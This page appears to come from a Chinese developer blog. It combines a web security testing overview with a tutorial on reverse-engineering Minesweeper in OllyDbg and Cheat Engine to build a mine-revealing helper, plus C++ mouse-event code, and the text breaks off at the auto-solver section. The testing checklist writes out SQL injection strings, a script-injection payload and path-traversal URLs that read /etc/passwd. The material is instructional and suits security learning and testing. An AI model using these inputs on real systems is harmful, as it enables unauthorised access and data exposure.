精华内容
下载资源
问答
  • 为了减少煤巷掘进工作面现场事故的发生,运用事故致因"2-4"模型理论和可视化管理方法,认为可视化管理可以作用于...安全标志设计预防煤巷掘进工作面现场事故的发生,最大限度地发挥安全标志的作用,保护员工的生命安全。
  • 什么是web安全测试

    千次阅读 2020-05-08 20:58:54
    1.1什么是web安全测试? Web安全测试就是要提供证据表明,在面对敌意和恶意输入的时候,web系统应用仍然能够充分地满足它的需求 1.2为什么进行Web安全测试 2005年06月,CardSystems,黑客恶意侵入了它的电脑系统,...

    1.1什么是web安全测试?

    Web安全测试就是要提供证据表明,在面对敌意和恶意输入的时候,web系统应用仍然能够充分地满足它的需求

    1.2为什么进行Web安全测试

    2005年06月,CardSystems,黑客恶意侵入了它的电脑系统,窃取了4000万张信用卡的资料。

    2011年12月,国内最大的开发者社区CSDN被黑客在互联网上公布了600万注册用户的数据;黑客随后陆续公布了网易、人人、天涯、猫扑等多家大型网站的数据信息。

    2014年12月,大量12306用户数据被泄露,被泄露的数据达131653条,包括用户账号、明文密码、身份证和邮箱等多种信息。

    2018年03月,Facebook泄露数千万用户的数据,信息被违规滥用,导致股价一度下跌;12月再次因一个软件漏洞导致用户的私人照片遭泄露。

    目前web应用越来越广泛,web安全威胁也就更明显,而web攻击隐蔽性强,危害性大。因而web安全测试也就显得尤为必要了。

    1.3web安全的认识误区
    lWeb网站使用了防火墙,所以很安全
    lWeb网站使用了IDS,所以很安全
    lWeb网站使用了SSL加密,所以很安全
    l漏洞扫描工具没发现任何问题,所以很安全
    l我们每季度都会聘用安全人员进行审计,所以很安全

    2:web攻击的主要类型
    跨站脚本(XSS)攻击
    SQL注入
    XML注入
    目录遍历
    上传漏洞攻击
    下载漏洞攻击
    信息泄露
    访问控制错误

    2.1跨站脚本(XSS)攻击
    XSS又叫CSS(CrossSiteScript),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
    盗取Cookie
    钓鱼
    操纵受害者的浏览器
    蠕虫攻击

    反射型跨站(reflected xss)
    服务端获取HTTP请求中的参数,未经过滤直接输出到客户端。如果这些参数是脚本,它将在客户端执行。(钓鱼常见)

    存储型跨站(Sstored xss)
    用户输入的数据存放在服务端(一般放数据库里),其他用户访问某个页面时,这些数据未经过滤直接输出。这些数据可能是恶意脚本,对其他用户造成危害。(挂马常见)

    mom跨站(DOM-Based XSS)
    攻击者提交的恶意数据并未显式的包含在web服务器的响应页面中,但会被页面中的js脚本以变量的形式来访问到,导致浏览器在渲染页面执行js脚本的过程中,通过DOM操作执行了变量所代表的恶意脚本。

    跨站请求伪造(csrf)
    强迫受害者的浏览器向一个易受攻击的Web应用程序发送请求,最后达到攻击者所需要的操作行为。恶意请求会带上浏览器的Cookie。受攻击的Web应用信任浏览器的Cookie

    2.2 sql注入

    将SQL命令人为的输入到URL、表格域、或者其他动态生成的SQL查询语句的输入参数中,完成SQL攻击。在这里插入图片描述
    查询数据库中的敏感内容
    绕过认证
    添加、删除、修改数据
    拒绝服务

    典型例子:
    原URL:http://localhost/name?nameid=222
    攻击SQL注入:http://localhost/name?nameid=‘’or1=1
    注入点一般存在以下几个地方:
    在这里插入图片描述
    2.3XML注入
    和SQL注入原理一样,XML是存储数据的地方,如果在查询或修改时,如果没有做转义,直接输入或输出数据,都将导致XML注入漏洞。攻击者可以修改XML数据格式,增加新的XML节点,对数据处理流程产生影响。
    在这里插入图片描述
    2.4目录遍历
    目录遍历攻击指的是:恶意用户找到受限文件的位置并且浏览或者执行它们。
    攻击者浏览受限文件,比如读取配置文件、密码文件等,就会破坏隐私,甚至引发安全问题。而如执行了受限的文件,攻击者就可以根据自己的意愿来控制和修改web站点在这里插入图片描述
    2.5上传文件

    Web应用程序在处理用户上传的文件时,没有判断文件的扩展名是否在允许的范围内,或者没检测文件内容的合法性,就把文件保存在服务器上,甚至上传脚本木马到web服务器上,直接控制web服务器。
    未限制扩展名
    未检查文件内容
    病毒文件

    2.6任意文件下载
    Web应用程序提供下载文件的路径时,文件的路径用户可控且未校验或校验不严,攻击者通过”…/”字符来遍历高层目录,并且尝试找到系统的配置文件或者系统中存在的敏感文件。
    下载任意附件
    下载数据库配置文件等

    2.7消息泄露
    Web应用程序在处理用户错误请求时,程序在抛出异常的时候给出了比较详细的内部错误信息,而暴露了不应该显示的执行细节,如文件路径、数据库信息、中间件信息、IP地址等

    2.8访问控制错误
    系统没有对URL的访问作出限制或者系统已经对URL的访问做了限制,但这种限制却实际并没有生效。攻击者能够很容易的就伪造请求直接访问未被授权的页面。
    例如,通过一个参数表示用户通过了认证:
    http://www.example.com/userinfo.jsp?authenticated=no 通过修改authenticated参数为Yes:
    http://www.example.com/userinfo.jsp?authenticated=yes

    3.1web安全测评要求
    信息系统的安全保护等级分为五级,一至五级等级越高,约束越严格。以二级为例,应用安全测评要求(二级)为:身份鉴别、访问控制、安全审计、通信完整性、通信保密性、软件容错、资源控制;
    在这里插入图片描述
    3.2web安全测试方法
    手动测试(结合测评要求)
    自动测试
    混合测试在这里插入图片描述
    手动测试 :
    1.不登录系统,直接输入登录后的页面的url是否可以访问
    2.不登录系统,直接输入下载文件的url是否可以下载,如输入http://url/download?name=file是否可以下载文件file
    3.退出登录后按后退按钮能否访问之前的页面
    4.ID/密码验证方式中能否使用简单密码。如密码标准为6位以上,字母和数字混合,不能包含ID,连续的字母或数字不能
    超过n位
    5.重要信息(如密码,身份证号码,信用卡号等)在输入或查询时是否用明文显示;在浏览器地址栏里输入命令
    javascrīpt:alert(doucument.cookie)时是否有重要信息;在html源码中能否看到重要信息
    6.手动更改URL中的参数值能否访问没有权限访问的页面。如普通用户对应的url中的参数为l=e,高级用户对应的url中的参
    数为l=s,以普通用户的身份登录系统后将url中的参数e改为s来访问本没有权限访问的页面
    7.url里不可修改的参数是否可以被修改
    8.上传与服务器端语言(jsp、asp、php)一样扩展名的文件或exe等可执行文件后,确认在服务器端是否可直接运行
    9.注册用户时是否可以以’–,‘or1=1–等做为用户名
    10.传送给服务器的参数(如查询关键字、url中的参数等)中包含特殊字符(’,'and1=1–,'and1=0–,'or1=0–)时是否可
    以正常处理
    11.执行新增操作时,在所有的输入框中输入脚本标签(<scrīpt>alert("")< scrīpt><="" font="">)后能否保存
    12.在url中输入下面的地址是否可以下载:
    http://url/download.jsp?file=C:\windows\system32\drivers\etc\hosts,http://url/download.jsp?file=/etc/passwd
    13.是否对session的有效期进行处理
    14.错误信息中是否含有sql语句、sql错误信息以及web服务器的绝对路径等
    15.ID/密码验证方式中,同一个账号在不同的机器上不能同时登录
    16.ID/密码验证方式中,连续数次输入错误密码后该账户是否被锁定
    17.新增或修改重要信息(密码、身份证号码、信用卡号等)时是否有自动完成功能(在form标签中使用autocomplete=off
    来关闭自动完成功能

    3.3工具的使用
    AWVS
    WebInspect
    AppScan

    AppScan原理
    通过搜索(爬行)发现整个Web应用结构
    根据分析,发送修改的HTTPRequest进行攻击尝试(扫描规则库)
    通过对于Respone的分析验证是否存在安全漏
    在这里插入图片描述

    展开全文
  • 第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。基础性文章,西电UI您...

    从2019年7月开始,我来到了一个陌生的专业——网络空间安全。初入安全领域,是非常痛苦和难受的,要学的东西太多、涉及面太广,但好在自己通过分享100篇“网络安全自学”系列文章,艰难前行着。感恩这一年相识、相知、相趣的安全大佬和朋友们,如果写得不好或不足之处,还请大家海涵!

    接下来我将开启新的安全系列,叫“安全攻防进阶篇”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等,也将通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步,加油~

    在这里插入图片描述

    第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。该篇文章也是作者学习科锐钱林松老师在华中科技大学的分享视频,这里非常推荐大家去看看。话不多说,让我们开始新的征程吧!您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好或侵权的地方,可以联系我删除。基础性文章,希望对您有所帮助,作者的目的是与安全人共同进步,加油~

    作者的github资源:
    软件安全:https://github.com/eastmountyxz/Software-Security-Course
    其他工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study
    Windows-Hacker:https://github.com/eastmountyxz/Windows-Hacker-Exp


    声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。(参考文献见后)


    一.什么是逆向分析

    1.逆向工程

    科锐钱老师真的是大佬,拥有十余年的逆向工作经验,专注于先进技术的算法还原及逆向实训。作者从中学习到很多知识。本次课程分享的是逆向分析技术的引导,课程目标是带领大家了解下逆向分析是干什么的,在安全领域中是什么地位,并且穿插各种实战示例,尽量提高大家的兴趣。逆向分析是安全的基础行业,喜欢的人觉得很好玩,不喜欢的人觉得很苦逼。

    在讲逆向分析前,大家思考下:你有没有把别人的产品或Demo还原出源代码来过呢?而且就是作者的源代码,包括里面的BUG。

    • 反汇编:一次编译技术,阅读汇编代码反推出对应的高级代码,比如VC、GCC、Delphi等。
    • 反编译:通常在C#、Java、.NET框架等,因为它可以直接把元数据还原成高级代码,反编译其实更难,但是对使用的人更简单,比如Android的APK反编译成JAVA源代码。

    下面开始吧!第一个大家需要知道的是“什么是逆向工程?”


    什么是逆向工程?
    简单而言,一切从产品中提取原理及设计信息并应用于再造及改进的行为,都是逆向工程。在信息安全中,更多的是调查取证、恶意软件分析等,不管你用什么工具或手段,能达到其目的就算逆向分析。下图是《变形金刚》里面对它的描述,2007年的时候国内对信息安全重视程度也不高,对逆向分析也没有什么概念,真正重视是从老大提出“没有网络安全就没有国家安全”之后。而那时候的国外电影就已经用到了“reverse engineered”,说明国外导员对这个技术及应用场景都是了解的。

    在这里插入图片描述

    逆向工程最早是在二Z时的船舶工业,分析船的弱点,通过外形反推内部结构,其中粉红色是Amuno、黄色是引擎室、蓝色是龙骨、绿色是推进器等等。只有知道怎么造一个船后,才能进行逆向分析。

    在这里插入图片描述

    当然还有模具逆向、材料逆向、软件逆向,在我们的软件行业,就称为软件逆向。同样,在网络攻防中,你不可能先给出源码再进行攻击,通常在安全对抗中第一步要做的就是逆向分析,不管你用什么方式进行逆向分析,你都需要搞清楚:

    • 它是什么:样本是什么,良性的还是恶意的
    • 它干了什么:样本做了哪些事情
    • 我们怎么办:知道做了什么才能进行反制,如删除注册表启动项、清理感染的勒索病毒等

    在这里插入图片描述



    2.逆向分析的典型应用

    软件逆向有很多实现办法达到我们的目标,典型的应用包括软件工程、网络安全、司法取证、商业保护等。

    在这里插入图片描述


    逆向应用——病毒分析
    对于逆向分析,最大的行当就是病毒分析。对于一个安全企业来说,比如360,它的病毒分析团队属于它的主业,包括360、金山毒霸、腾讯医生等,它们主要业务就是根据一些恶意样本的行为,给出解决方案(专业查杀、完善引擎、应急响应),比如WannaCry爆发时,立刻分析其原因和传播漏洞,分析其影响程度及给出解决方案。所以,研究逆向病毒的人很多,当然坏的行当做游戏WG也很多,它们的对抗也是没有源码的,游戏安全人员会分析WG样本进行完善及修补。

    2000年早期制作病毒的人都比较单纯,写病毒是为了技术炫耀或开玩笑,典型的比如乒乓球病毒,每个周末都爆发,开启计算机后就有个乒乓球在电脑上弹,导致电脑不能用,而周一到周五恢复正常(可能是讨厌加班),此时的病毒没有获取用户隐私、删除数据等行为。

    在这里插入图片描述


    逆向利用——游戏保护
    从2005年开始,随着网游普及和网络虚拟财产(游戏装备)出现,大家也没有安全意识,出现了很多恶意程序和病毒,比如熊猫烧香,它是由李俊制作并肆虐网络的一款电脑病毒,是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒,它不但能感染系统中exe、com、pif、src、html、asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的系统备份文件。

    同时,游戏WG也开始增多,并形成了包括私服、生产、PJ、DH等功能的生产线,通过分析游戏的关键数据结构,找到关键数据并对数据做修改以达到提升的效果。比如吃鸡游戏,如果你通过逆向分析找到每个玩家的坐标位置了,你是不是可以写一个透视G,前提是你知道其数据以什么形式存放在哪里,这就属于PJ挂。你甚至还可以修改攻击力、防御值,游戏的碰撞检测(两者间距离小于某个值)也可以取消实现飞天、穿墙等。

    在这里插入图片描述

    当然,我们的信息安全是正能量的,逆向分析主要是剖析病毒,包括:

    • 逆向病毒,获取病毒传播方法,可以遏制病毒传播
    • 逆向病毒,获取病毒隐藏手段,可以根除病毒
    • 逆向分析病毒,获取功能目的,可以溯源定位攻击者

    逆向应用——漏洞挖掘
    逆向应用还包括漏洞挖掘和漏洞利用,其中黑客挖掘漏洞的常用方法为:

    • 通过分析开源软件的源代码,获取漏洞
    • 通过分析产品本身获取漏洞
    • 通过分析可以利用漏洞的软件样本
    • 通过比较软件前后补丁的差异

    大家是否有研究过shellcode、缓冲区溢出?漏洞利用溢出缓冲区,首先要把关键内存、关键代码定位出来,这就属于逆向分析。在漏洞利用过程中,只有你越熟悉周围环境则可利用的漏洞就越多,比如逆向服务端,调用shell创建新用户功能,这个时候是没有源代码的,所以需要利用漏洞分析。

    逆向分析是信息安全行业的基础技术、必须技术和重要技术,只有你功力越深厚,则做的事情就越多。

    在这里插入图片描述


    漏洞利用——比较补丁
    下图展示了比较补丁前后差异的工具。比如官方软件在网上有安全更新,关注安全行情和漏洞公告的行当或企业会对比官方的补丁,在拿到官方升级后的软件,他们会对两个流程做比较,其中左边流程多了一个节点,说明升级就是这个位置,再详细分析为什么多了这个个检测。注意,官方公告通常会非常简略(补丁号、造成后果、影响范围),比如某个MP3播放器在播放某个冷门格式的音频文件时,会触发一个远程溢出问题,接下来我们就需要去做逆向分析,下载升级前和升级后的版本做流程对比。

    在这里插入图片描述


    逆向应用——电子取证
    通过样本追踪地理位置的实例,后续会给出一个实战案例。

    在这里插入图片描述


    漏洞利用——无文档学习
    表示没有源码的情况下获取程序信息,称为竞品分析。假设某个公司对同行的产品很感兴趣,想知道为什么它们的算法比我们的好,然后需要去分析和算法还原,这也是逆向分析的主要应用。最好的竞品分析,是能够将算法完美还原,两个代码再次编译后,除了地址不一样其他都一样(IDA查看)。注意,看懂代码完善程序并换另一种程序语言复现,算学习;而如果直接COPY别人的二进制或二进制序列,这算抄袭。

    在这里插入图片描述



    二.扫雷游戏逆向分析

    1.游戏介绍

    下面通过扫雷游戏进行逆向分析讲解。

    在这里插入图片描述

    此时我们打开一个工具,360会提示危险操作,点击“允许本次操作”即可。

    在这里插入图片描述

    此时就能够判断某个点是不是雷,从而方便我们点击完成扫雷游戏,O(∩_∩)O

    在这里插入图片描述

    接着进行逆向分析。扫雷中肯定有雷区的定义,作为程序员,你会怎么定义有雷或没有雷,或者插个旗子的状态呢?我们会使用一个二维数组来存储。那么,什么时候肯定会访问这个二维数组呢?在绘制整个游戏区、点击方格的时候都会访问。

    在绘制游戏区时,Windows编程有个关键函数,叫做——BeginPaint。BeginPaint函数为指定窗口进行绘图工作的准备,并用将和绘图有关的信息填充到一个PAINTSTRUCT结构中,所以它将是个突破口。



    2.OllyDbg动态分析

    接着我们使用Ollydbg打开,在逆向分析中,动态分析(OD)和静态分析(IDA)非常多,动静结合也是常用的分析手段。

    推荐作者上一个系列的两篇入门文章:

    • 静态分析:程序并未运行,通过分析文件的结构(格式)获取其内部原理。
    • 动态分析:在程序的运行过程中,分析其内部原理。
    • 灰盒分析:既不静态也不调试,通过一堆监控软件(注册表监控、文件监控、进程监控、敏感API监控)在虚拟机中跑程序,再分析恶意软件的大体行为,并形成病毒分析报告。

    至于哪种方法更好?我们需要具体问题具体分析,如果是分析扫雷游戏,因为没有危害可以动态调试分析,但如果是WannaCry蠕虫,你就不能在真机上动态分析。同时,很多安全公司为了及时响应各种安全事件,会把样本自动上传到服务器中,它们每天会收到成千上万的恶意样本,但可能存在某些未知样本只上传部分的原因,比如某个未知样本是个动态链接库,此时没有运行条件,只能进行静态分析或者模拟接口分析。

    在这里插入图片描述

    软件静态分析包括分析文件格式、分析网络协议、分析软件日志、修改存档文件等,下图展示了通过修改文件游戏作弊的示例。

    在这里插入图片描述

    软件动态调试可以用于HH翻译,比如《仙剑奇侠传》。

    在这里插入图片描述


    OllyDbg是一个新的动态追踪工具,将IDA与SoftICE结合起来的思想,Ring 3级调试器,非常容易上手,是当今最为流行的调试解密工具之一。它还支持插件扩展功能,是目前最强大的调试工具之一。OllyDbg打开如下图所示,包括反汇编窗口、寄存器窗口、信息窗口、数据窗口、堆栈窗口。

    • 反汇编窗口:显示被调试程序的反汇编代码,包括地址、HEX数据、反汇编、注释
    • 寄存器窗口:显示当前所选线程的CPU寄存器内容,点击标签可切换显示寄存器的方式
    • 信息窗口:显示反汇编窗口中选中的第一个命令的参数及跳转目标地址、字符等
    • 数据窗口:显示内存或文件的内容,右键菜单可切换显示方式
    • 堆栈窗口:显示当前线程的堆栈

    下图是打开EXE后显示的界面。

    OD常用的快捷键调试方式包括:

    F2
    设置断点,如下图所示的红色位置,程序运行到此处会暂停,再按一次F2键会删除断点。

    F9
    按下这个键运行程序,如果没有设置相应的点,被调试的程序直接开始运行。

    F8
    单步步过,每按一次这个按键,将执行反汇编窗口中的一条指令,遇到CALL等子程序不进入其代码。

    F7
    单步步入,功能通单步步过(F8)类似,区别是遇到CALL等子程序时会进入其中,进入后首先停留在子程序的第一条指令上。如下图进入CALL子程序。

    F4
    运行到选定位置,即运行到光标所在位置处暂停。

    CTRL+F9
    执行到返回,按下此键会执行到一个返回指令时暂停,常用于从系统领空返回到我们调试的程序领空。

    ALT+F9
    执行到用户代码,从系统领空快速返回我们调试的程序领空。


    接着正式分析扫雷程序。

    第一步:启动OllyDbg软件,选择菜单“文件”,打开winmine.exe文件。
    这里我们猜测游戏中存在一个二维数组,当我们显示界面时会访问这个二维数组,并且调用BeginPaint函数来显示界面。所以接下来需要找到调用BeginPain的位置。

    在这里插入图片描述


    第二步:在反汇编窗口右键鼠标,选择“查找”->“当前模块中的名称”。

    在这里插入图片描述

    当我们在键盘上输入“BEGINPAINT”时,能够迅速找到对应的函数。

    在这里插入图片描述


    第三步:点击右键选择“在每个参考上设置断点”。

    在这里插入图片描述

    接着点击下图所示的“B”进行断点设置界面。
    在这里插入图片描述

    双击该断点会进入到反汇编窗口BeginPaint对应位置。

    在这里插入图片描述


    第四步:按下“F9”运行程序,可以看到在BeginPaint和EndPaint之前有一个CALL函数。

    在这里插入图片描述

    选中该行右键“跟随”之后,去到0x01002AC3位置,发现又存在很多个CALL函数。

    在这里插入图片描述

    一种方法是一个一个函数分析,这里使用另一种方法。当我们在使用扫雷时,发现它的界面并没有闪烁,所以怀疑使用了 双缓存技术,这是我们的突破口。双缓存是在缓存中一次性绘制,再把绘制的结果返回在界面上。比如,你要在屏幕上绘制一个圆、正方形、直线,需要调用GDI的显示函数,操作显卡画一个圆,再画一个正方形和直线,它需要访问硬件三次;此时依赖硬件的访问速度,而且如果绘制错误擦除再绘制,需要反复的访问硬件,为了减少硬件操作,我们在内存中把需要绘制的图像准备好,然后一切妥当之后提交给硬件显示。

    PS:当然,为什么是双缓存技术呢?目前的我也无法理解。只有当我们做了大量的逆向分析后,才会养成一定的经验来帮助我们判断。任何行业和技术都是这样的,包括作者自己,目前也是一步一个脚印的去学习,去总结,去进步。期待与您前行,加油~


    第五步:继续在反汇编窗口右键鼠标,选择“查找”->“当前模块中的名称”,找到双缓存技术的核心函数BitBlt。
    BitBlt是将内存中的数据提交到显示器上,该函数对指定的源设备环境区域中的像素进行位块(bit_block)转换,以传送到目标设备环境。

    在这里插入图片描述

    点击右键选择“在每个参考上设置断点”,如下图所示,此时绘制了两个断点。

    在这里插入图片描述


    第六步:运行程序去到第二个断点BitBlt位置。

    在这里插入图片描述

    注意,此时显示了两层循环,刚好符合我们二维数组的遍历,按F8单步步过可以动态调试观察其效果。

    在这里插入图片描述


    第七步:在0x01002700位置按下F2取消断点,并在该函数的起始位置0x010026A7设置断点,接下来需要详细分析这个双缓存函数绘制过程。

    在这里插入图片描述

    代码中,ESI首先通过XOR进行清零,然后再加1;接着ESI会调用CMP进行比较,说明ESI是循环变量。接下来“MOV AL, BYTE PTR [EBX+ESI]”表示将EBX和ESI相加赋值给AL,然后AL判断一个值再做其他的,这有点像访问数据,后面的显示特性随着AL做改动,即AL影响后面显示的内容。

    MOV指令是数据传送指令,也是最基本的编程指令,用于将一个数据从源地址传送到目标地址(寄存器间的数据传送本质上也是一样的)。

    在这里插入图片描述


    第八步:下面看看寄存器,其中EBX是基址寄存器,ESI是它的偏移量,猜测这个EBX基址寄存器和关键数据有关。

    在这里插入图片描述

    选择EBX基址寄存器,然后选择“数据窗口中跟随”,显示如下图所示的数据。

    在这里插入图片描述

    数据窗口显示如下,我们发现“0F”出现较多,猜测多的这个可能是空的,少的那个是雷“8F”。

    在这里插入图片描述


    第九步:数据区详细分析。
    我们选择0x010026A7位置,然后按下F2取消断点,然后继续运行程序,此时弹出扫雷主界面。游戏中通常会存在边界(围墙),这里“10”应该是边界位置,而0x01005361则为起始位置。

    在这里插入图片描述

    如果第一个不是雷、第二个不是雷、第三个不是雷,第四个才是雷,我们“0F”是空格,“8F”是雷的猜测则正确。

    在这里插入图片描述

    我们取消0x01002700位置的断点,然后运行程序弹出扫雷界面,根据下面的二维矩阵进行扫雷。

    在这里插入图片描述

    如下图所示,前面3个果然时空格,而第四个则时雷。“8A”是雷,“0F”是空格实锤,而且点过的地方会变成数字,比如“40”、“41”、“42”等。

    在这里插入图片描述


    第十步:写个程序进行扫雷数据区详细分析。
    我们重新运行程序,选择“查找”->“当前模块中的名称”,找到双缓存技术的核心函数BitBlt,然后重新找一下,找到代码位置。如下图所示,EBX就是雷区的起始位置,我们要想办法把它读取出来,再往前“MOV EBX, 01005360”代码看到了EBX的赋值定义。

    在这里插入图片描述

    接着我们输入F7单步调试,执行完0x010026C4赋值语句后,我们在数据窗口中跟随EBX寄存器,显示如下图所示。前面8个均为“0F”表示空格,第9个为雷,再验证一次“01005360位置”,就开始准备写程序了。

    在这里插入图片描述

    验证成功,开始写程序吧!

    在这里插入图片描述


    第十一步:扫雷辅助程序。
    我们编写了这样一个程序,当它开启后,我们鼠标移动到方格,如果是雷它的标题会变成“扫雪(xue)”,然后我们不点击它就可以了。哈哈~

    在这里插入图片描述

    正常是“扫雷”。

    在这里插入图片描述

    雷区显示为“扫雪”。当然你也可以写得更隐蔽些,比如和苹果电话手表建立连接,如果是“雷”让手表震动一下,否则正常。

    在这里插入图片描述


    注意,基本原理知道后,就需要开发解决问题了。对于安全行业来说,不管是做病毒还是研究漏洞利用或游戏防护的,逆向分析都是基础,开发解决问题才是关键。比如,某个病毒样本的行为已经分析清楚了,这个病毒在哪里创建系统文件、修改哪个系统文件、注入到哪个进程、动了哪个注册表等等,逆向分析第一步完成,但更重要的是怎么解决问题,创建注册表就需要删除注册表,修改系统文件就要还原文件。

    我们在网上搜索某些病毒资料时,有些逆向工程师会给出手工修复方案,比如关闭哪个服务、删除哪个隐藏文件、手工清除注册表哪一项等。但是对于安全公司来说,比如360公司,你安全扫描完成之后,不可能弹框提示用户手工修复,而是需要提供自动化方案一键修复,最终结果是需要修改杀毒软件的引擎代码,或者提供专杀工具给用户,这个时候工具需要自动化完成相关操作。

    很多新手会看不起开发,觉得搞逆向、搞网安的是王道,不用学开发,这是不对的。 针对上面的实战,我们就发现逆向是站在开发基础上,反向推导作者是怎么做的,比如扫雷需要思考作者会用什么方式表示雷区,然后怎么用UI体现出来以及调用什么函数实现。所以,逆向分析之前都要教开发类的课程,《数据结构》《操作系统》《计算机组成原理》《编译原理》等课程掌握越深入越好。



    三.扫雷游戏检测工具

    通过第二部分,我们知道以下信息:

    • 扫雷的首地址为0x01005360
    • 显示“0F”表示空格,显示“8F”表示雷
    • 雷区的边界为0x10

    原理是找到雷在内存中的值,只要不是雷值我们把它点击开来。接下来作者再补充一个逆向辅助工具,通过CheatEngine实现雷区检测。

    Cheat Engine又称CE修改器,是一款内存修改编辑工具。你可以通过Cheat Engine软件来修改游戏中的内存数据、人物属性、金币数值等等,功能强大且操作简单,可以为你带来良好的更好的体验游戏。


    1.Cheat Engine确定起始位置

    第一步,打开Cheat Engine软件,点击“选择打开一个程序”按钮,如下图所示。

    在这里插入图片描述

    打开扫雷软件设置为初级。

    在这里插入图片描述


    第二步,选择扫描类型为“未知的初始数值”,选择“数值类型”为字节,然后点击“首次扫描”。

    在这里插入图片描述

    此时显示7,290,880个数据,如下图所示:

    在这里插入图片描述


    第三步,接着我们点击扫雷,然后在“扫描类型”中选择“变动的数值”,点击“再次扫描”,此时返回结果183,169个。最终通过反复的筛选找到首地址。

    在这里插入图片描述

    继续点击扫描,如下图所示。

    在这里插入图片描述


    第四步,如果出现地雷则选择“未变动的数值”,点击“再次扫描”,接着继续新一轮的扫雷游戏。

    在这里插入图片描述

    在这里插入图片描述

    始终以第一个方格的状态为目标进行重复的操作。

    • 开始扫描:设置“未知的初始数值”
    • 扫描第一个格子:设置“变动的值”
    • 继续扫描,结果是雷:设置“未变动的值”
    • 继续扫描,结果非雷:设置“未变动的值”
    • 重新开始:设置“变动的值”
    • 重新开始如果第一个格子和上一次一样,则设置“未变动的值”,否则“变动的值”

    下图展示了最后5个结果,接着继续反复筛选。

    在这里插入图片描述

    最终获取如下图所示的结果,其初始地址为——0x01005361,和前面OD软件分析的一样。

    在这里插入图片描述


    第五步,双击该行移动至底部,然后右键选择“浏览相关内存区域”选项。

    在这里插入图片描述

    显示内容如下图所示,它同样和我们前面OD分析的内容一致。其中“8F”表示雷,“40”表示空格,“41”到“49”表示数字,“10”表示边界,同时“0F”表示隔一行。

    在这里插入图片描述

    如下图所示,成功完成了扫雷游戏,O(∩_∩)O

    在这里插入图片描述

    在这里插入图片描述


    2.Cheat Engine确定边界

    第一步,我们查看扫雷初级的高度是“9”,然后重新打开建立“新的扫描”。

    在这里插入图片描述

    输入数字“9”再点击“首次扫描”,返回7174个结果。

    在这里插入图片描述


    第二步,选择中级难度,对应的高度是“16”,然后重新打开建立“再次扫描”,仅剩4个结果。

    在这里插入图片描述

    在这里插入图片描述


    第三步,选择高级难度,设置高度最高即“24”,然后重新打开建立“再次扫描”

    在这里插入图片描述

    最终剩2个结果,高度可能是:

    • 0x01005338
    • 0x010056A8

    在这里插入图片描述


    第四步,使用同样的方法找到宽度。
    宽度返回两个结果:

    • 0x01005334
    • 0x010056AC

    在这里插入图片描述



    3.C++编写鼠标坐标获取案例

    接下来我们开始编写代码,首先给大家看看鼠标坐标获取的一段代码,我们鼠标通常是(x, y)的形式。

    第一步,创建空项目,名称为“MouseMsg”。

    在这里插入图片描述


    第二步,为该工程添加一个“main.cpp”文件,并且添加启动项。

    在这里插入图片描述

    在这里插入图片描述


    第三步,配置graphics.h文件。
    graphics.h是一个针对Windows的C语言图形库,分为像素函数、直线和线型函数、多边形函数、填充函数等。在学习C++游戏编程时,通常会发现VS中没有”graphics.h”头文件,因此需要配置。

    (1) 先从作者github中下载好所需要的文件,如下所示:

    在这里插入图片描述

    下载完后打开下载好的 Inlcude 文件夹,里面有两个头文件:

    在这里插入图片描述

    (2) 将里面的两个文件进行复制,然后粘贴到VS安装目录的include文件夹中。

    • C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\include

    在这里插入图片描述

    (3) 打开下载好的文件夹中的 lib2015子文件夹,将里面的东西全部选中复制,粘贴到VS2015安装目录的 lib 文件夹中。

    • C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\lib\x86
    • C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\lib\x64

    在这里插入图片描述
    在这里插入图片描述

    (4) 接下来就可以在VS中添加“graphics.h”头文件了,里面有很丰富的绘图函数可供我们使用。

    #include <graphics.h>              // 引用图形库头文件
    #include <conio.h>
    
    int main()
    {
    	initgraph(640, 480);            // 创建绘图窗口,大小为 640x480 像素
    	setlinecolor(RGB(255, 0, 0));   // 设置当前线条颜色
    	setfillcolor(RGB(0, 255, 0));   // 设置当前填充颜色
    	fillcircle(200, 200, 100);      // 画圆,圆心(200, 200),半径 100
    	_getch();                       // 按任意键继续
    	closegraph();                   // 关闭图形环境
    }
    

    在这里插入图片描述


    第四步,编写鼠标事件代码。

    #include <graphics.h>              // 引用图形库头文件
    #include <stdio.h>
    
    int main()
    {	
    	//定义鼠标
    	MOUSEMSG m;
    	//初始化窗口 500宽度 500高度
    	initgraph(500, 500);
    
    	while (1) {
    		//获取鼠标消息
    		m = GetMouseMsg();
    		char buff[256];
    
    		//鼠标左键按下
    		if (m.uMsg == WM_LBUTTONDOWN) {
    			//清空数组
    			memset(buff, 0, 256);
    			sprintf_s(buff, "X坐标:%d, Y坐标:%d", m.x, m.y);
    			MessageBox(NULL, buff, "坐标", MB_OK);
    		}
    	}
    	return 0;
    }
    

    运行前需要设置编码方式为“使用多直接字符集”,否则会报错。

    在这里插入图片描述

    运行结果如下图所示,可以看到鼠标点击会显示对应的坐标位置。

    在这里插入图片描述

    其中GetMouseMsg函数表示获取鼠标消息,通过Spy++可以看到很多Windows系统自带的鼠标操作、键盘操作、消息操作等,同时能获取鼠标是左键或右键按下以及对应坐标。

    在这里插入图片描述



    4.C++编写自动扫雷程序

